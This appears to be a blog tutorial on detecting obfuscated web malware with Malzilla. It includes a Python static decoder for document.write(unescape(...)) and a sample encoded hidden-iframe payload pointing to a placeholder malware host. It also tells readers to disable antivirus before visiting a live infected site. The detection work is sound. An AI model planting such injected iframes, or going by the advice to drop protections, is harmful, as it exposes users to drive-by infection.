Malzilla Documentation for Web Based Malware Detection
Buddies,
Before delving deeper into malware detection, let me add a few lines defining what malware is. Malware is code that gets executed on a system without the user's knowledge or consent. It comes in many kinds, depending on how it works and how it replicates itself across systems to affect the victim.
We won't be discussing those characteristics here; instead we will focus on the methods malware uses to spread across the wired world.
This is the era of the Internet, and it takes a fraction of a second to spread anything, whether it is news, software or whatever else. Malware uses the same channel to spread itself, because it is fast and more effective. Nowadays most malware authors spread their malicious code through web pages, since embedding malicious executables inside genuine executables is no longer very effective, though the evil guy may still use assorted bypassing techniques to keep their code undetected by various firewalls and antivirus products so that it reaches the remote system without obstacles.
So if the user is witty enough, the spread of malware can be prevented to some extent, even though it is sometimes very hard to mitigate. I will be discussing how you can detect such malware (through a live example) and how you can protect yourself from those attacks. So let's start!
We will be taking the help of the great tool Malzilla to detect web-based malware and see how it spreads. This post covers detection only; analysing the malware itself will be covered later.
A short intro about the tool ‘Malzilla’
Malzilla is a tool bundled with lots of awesome features: decoders for the encoded data used in various web pages, a JavaScript de-obfuscator, HTTP header info, code templates, a shellcode analyser, a link parser, an option to change the User-Agent setting, and so on. There are other useful features as well, but they are not part of our discussion right now.
For our analysis we have taken a live URL where a malware is being served, and we will see how it is obfuscated and how to get the details of the malware. Before starting your analysis, download Malzilla and run it. When the tool opens, you will see that we are in the Download tab. Before making the request to the infected site we should disable our installed antivirus/firewall application, otherwise it will detect and block the request to that website. For our analysis we have the website hosting the malware (Malware Location). If we put the URL into the URL field and fetch the page, within a second the source of that page appears in the text field. Another feature of Malzilla is that it shows the source of the web page in a proper format, which makes life easier when analysing the code. So now we have the page source with us, but so far we are not sure whether the requested page contains anything malicious or not.
As we know, evil coders always obfuscate their source code so that it can't be detected easily. That is why we have to de-obfuscate it, so that we can learn how they are hosting the malicious content. To do that we have to pick out the obfuscated pattern and decode it to find out what is happening under the hood. Once we have the source of the page, it is time to detect the obfuscated functions it contains. When we choose "Send script to decoder", Malzilla detects the obfuscated code and highlights it, and now we know that JavaScript is used here to obfuscate the code. After sending the code to the decoder, our intention is to find the real culprit. Choose the Decoder tab, where you can see that the obfuscated script has been copied over, and we can see that the "document.write()" attack pattern is being used here along with "unescape()". If we now run the script by clicking "Run script", we learn that an 'iframe' tag is used here to embed the URI where the malware is hosted.
NOTE: Malzilla uses eval() to return the source URI and uses JavaScript libraries internally to decode the obfuscated code, so that the user can find out exactly what is happening without being affected by the malware.
Malzilla also has the option to change the User-Agent as well as the Referer info, which is a nice advantage. It helps the user to debug further, because malware is coded to take advantage of various browser vulnerabilities by reading the User-Agent from the HTTP headers and then attempting to exploit the remote system accordingly.
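The document.write(unescape(...)) pattern described above can also be decoded statically, without handing the script to eval() at all. The following is an added example (not part of the original post and not Malzilla's code) that implements JavaScript's unescape() semantics in Python and pulls the hidden iframe src out of a constructed page fragment; the host name in the sample is a placeholder, not a real indicator.

```python
import re

# Constructed sample page fragment using the document.write(unescape(...)) pattern.
# The iframe URL is a placeholder made up for this example, not a real malware host.
SAMPLE_PAGE = """<html><body>
<script>
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fmalware-host.example%2Fpath%2Fin.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'));
</script>
</body></html>"""

# Matches document.write(unescape('<percent-encoded string>')) with either quote style.
UNESCAPE_CALL = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S
)
# Pulls the src attribute out of an <iframe ...> tag in the decoded HTML.
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def js_unescape(s):
    """Decode a string the way JavaScript's unescape() does.

    %XX is a Latin-1 code point and %uXXXX a UTF-16 code unit; both are
    replaced in a single pass so decoded characters are never re-decoded.
    """
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", repl, s)


def decode_document_writes(page):
    """Return the decoded HTML written by each document.write(unescape(...)) call."""
    return [js_unescape(m.group(2)) for m in UNESCAPE_CALL.finditer(page)]


def extract_iframe_sources(page):
    """Statically recover iframe src values hidden behind document.write(unescape(...))."""
    sources = []
    for html in decode_document_writes(page):
        sources.extend(IFRAME_SRC.findall(html))
    return sources


if __name__ == "__main__":
    for html in decode_document_writes(SAMPLE_PAGE):
        print("decoded:", html)
    print("iframe sources:", extract_iframe_sources(SAMPLE_PAGE))
```

Because nothing is executed, the same functions can be run over a whole directory of saved pages to flag any that hide an iframe this way.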
So overall we have now seen how malware finds places to infect systems and how it uses various obfuscation mechanisms to hide itself. Malzilla can be your rescue point if you want to dig deeper into what is really going on!!!
From the precaution point of view, it is always recommended to use antivirus applications and firewalls, which monitor your online activity and report immediately if something bad goes on under the hood!!! See screenshot no. 4 to see how the antivirus blocked the request to that malicious site: it raised a message saying the page contains a malicious 'iframe' and obfuscated code. That rejected request can also be seen inside the Malzilla tool itself.
At last I would like to say that Malzilla is a fantastic tool for your malware explorations. The more you work with it, the more you will love this tool!!!
I have attached some screenshots for your reference. I hope you find this information useful. Please feel free to contact me if you have any further doubts or feedback. Feedback is always welcome.